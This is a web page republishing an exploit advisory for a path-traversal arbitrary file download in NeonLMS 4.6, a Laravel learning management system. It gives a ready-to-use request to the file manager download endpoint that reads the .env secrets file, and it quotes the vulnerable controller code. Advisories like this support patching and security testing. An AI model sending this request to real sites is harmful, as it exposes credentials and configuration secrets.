Advertisement






NeonLMS - Learning Management System PHP Laravel Script - 'Arbitrary' File Download

CVE Category Price Severity
CVE-2021-41463 CWE-22 $1500 High
Author Risk Exploitation Type Date
RemoteM High Remote 2020-06-05
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.0324 0.70035

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020060024

Below is a copy:

NeonLMS - Learning Management System PHP Laravel Script - 'Arbitrary' File Download
# Exploit Title: NeonLMS - Learning Management System PHP Laravel Script - 'Arbitrary' File Download
# Exploit Author: th3d1gger
# Google Dork: N/A
# Type: Web App
# Date: 2020-06-04
# Vendor Homepage: https://www.neonlms.com/
# Software Link: https://codecanyon.net/item/neonlms-learning-management-system-php-laravel-script/23641351
# Affected Version: 4.6 
# Tested on: Windows
# CVE : N/A

#Vulnerable Request:
After Authentication as student,
browse https://neonlmshost/laravel-filemanager/download?file=/../../../.env

#Vulnerable code



\vendor\unisharp\laravel-filemanager\src\Controllers\DownloadController.php

    public function getDownload()
    {


            return response()->download(parent::getCurrentPath(request('file')));


    }

#fix
maybe devteam can use "auth user role check" in that function.
or can update it.

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.